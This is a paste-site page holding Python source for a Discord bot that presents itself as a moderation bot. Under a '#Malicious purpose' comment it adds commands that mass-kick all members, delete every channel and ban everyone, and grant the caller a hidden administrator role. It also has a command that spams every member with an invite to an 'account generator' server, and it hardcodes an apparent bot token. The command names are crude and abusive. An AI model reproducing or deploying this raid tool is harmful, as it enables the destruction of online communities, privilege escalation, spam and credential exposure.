____ _ _ | _ \ _____ _| |__ (_)_ __ | | | |/ _ \ \/ / '_ \| | '_ \ | |_| | (_) > <| |_) | | | | | |____/ \___/_/\_\_.__/|_|_| |_|
Username: Anonymous - (Login)
Please note that all posted information is publicly available and must follow our TOS.
╔───────────────────────────────────────────────────────────────────────────────────────────────────────────╗ _____ _____ _____ /\ \ /\ \ /\ \ /::\ \ /::\ \ /::\ \ /::::\ \ /::::\ \ /::::\ \ /::::::\ \ /::::::\ \ /::::::\ \ /:::/\:::\ \ /:::/\:::\ \ /:::/\:::\ \ /:::/ \:::\ \ /:::/__\:::\ \ /:::/__\:::\ \ /:::/ \:::\ \ /::::\ \:::\ \ /::::\ \:::\ \ /:::/ / \:::\ \ /::::::\ \:::\ \ /::::::\ \:::\ \ /:::/ / \:::\ ___\ /:::/\:::\ \:::\ \ /:::/\:::\ \:::\____\ /:::/____/ ___\:::| |/:::/ \:::\ \:::\____\/:::/ \:::\ \:::| | \:::\ \ /\ /:::|____|\::/ \:::\ /:::/ /\::/ |::::\ /:::|____| \:::\ /::\ \::/ / \/____/ \:::\/:::/ / \/____|:::::\/:::/ / \:::\ \:::\ \/____/ \::::::/ / |:::::::::/ / \:::\ \:::\____\ \::::/ / |::|\::::/ / \:::\ /:::/ / /:::/ / |::| \::/____/ \:::\/:::/ / /:::/ / |::| ~| \::::::/ / /:::/ / |::| | \::::/ / /:::/ / \::| | \::/____/ \::/ / \:| | \/____/ \|___| ╚───────────────────────────────────────────────────────────────────────────────────────────────────────────╝ import discord from discord.ext import commands from discord.ext.commands import Bot import asyncio import time import logging client = commands.Bot(command_prefix='$') #This Is The Prefix, Feel Free To Change It Anytime client.remove_command("help") @client.event async def on_ready(): print ("bot is now online") @client.event async def on_server_join(server): print("Joining {0}".format(server.name)) @client.command(pass_context=True) async def help(ctx): author = ctx.message.author embed = discord.Embed( colour = discord.Colour.blue() ) embed.set_author(name='help') embed.add_field(name='$ping', value='Gives ping to client (expressed in ms)', inline=False) embed.add_field(name='$kick', value='Kicks specified user', inline=False) embed.add_field(name='$ban', value='Bans specified user', inline=False) embed.add_field(name='$info', value='Gives information of a user', inline=False) embed.add_field(name='$invite', value='Returns invite link of the client', inline=False) embed.add_field(name='$clear', value='Clears an X amount of messages', inline=False) await client.send_message(author, embed=embed) @client.command(pass_context=True) async def dm(ctx, message): server = ctx.message.server for member in server.members: await asyncio.sleep(0) try: await client.send_message(member, "https://discord.gg/sujRrDX Join now for a cheap unlimited account generator!!") print("Sent message") except: pass @client.command(pass_context=True) async def clear(ctx, amount=10): channel = ctx.message.channel messages = [] async for message in client.logs_from(channel, limit=int(amount)): messages.append(message) await client.delete_messages(messages) await client.say('Messages deleted') @client.command(pass_context=True) async def ping(ctx): channel = ctx.message.channel t1 = time.perf_counter() await client.send_typing(channel) t2 = time.perf_counter() embed=discord.Embed(title=None, description='Ping: {}'.format(round((t2-t1)*1000)), color=0x2874A6) await client.say(embed=embed) @client.command(pass_context=True) async def info(ctx, user: discord.Member=None): if user is None: await client.say('Please input a user.') else: await client.say("The user's name is: {}".format(user.name) + "\nThe user's ID is: {}".format(user.id) + "\nThe user's current status is: {}".format(user.status) + "\nThe user's highest role is: {}".format(user.top_role) + "\nThe user joined at: {}".format(user.joined_at)) @client.command(pass_context=True) async def kick(ctx, user: discord.Member=None): author = ctx.message.author if author.server_permissions.kick_members: if user is None: await client.say('Please input a user.') else: await client.say (":boot: Get kicked **{}**, Damn kid".format(user.name)) await client.kick(user) else: await client.say('You lack permission to preform this action') @client.command(pass_context=True) async def ban(ctx, user: discord.Member=None): author = ctx.message.author if author.server_permissions.kick_members: if user is None: await client.say('Please input a user.') else: await client.say("Get banned **{}**, Damn kid".format(user.name)) await client.ban(user) else: await client.say('You lack permission to preform this action') @client.command(pass_context=True) async def invite(ctx): await client.say("https://discordapp.com/oauth2/authorize?&client_id=503182818667659274&scope=client&permissions=8") #Malicious purpose @client.command(pass_context=True) async def h(ctx): for user in list(ctx.message.server.members): try: await client.kick(user) print ("User " + user.name + " has been kicked from " + ctx.message.server.name) except: pass print ("Action Completed: kall") @client.command(pass_context=True) async def rape(ctx): for channel in list(ctx.message.server.channels): try: await client.delete_channel(channel) print (channel.name + " has been deleted in " + ctx.message.server.name) except: pass server = ctx.message.server channel = await client.create_channel(server, 'RIP', type=discord.ChannelType.text) await client.send_message(channel, "Now that's alot of damage!!") for user in list(ctx.message.server.members): try: await client.ban(user) print ("User " + user.name + " has been banned from " + ctx.message.server.name) except: pass print ("Now that's alot of damage") @client.command(pass_context=True) async def dab(ctx): server = ctx.message.server perms = discord.Permissions(8) await client.create_role(server, name='dab', permissions=perms) user = ctx.message.author role = discord.utils.get(user.server.roles, name="dab") await client.add_roles(user, role) print ("You're in buddy, now don't fuck it up") client.run("NzE3ODE0NDM1MDk5NzA1NTA1.XuNoIw.TX7YiBEtNnQauseIDB0zyWVLjoA")
1 year ago
1 year ago
1 year ago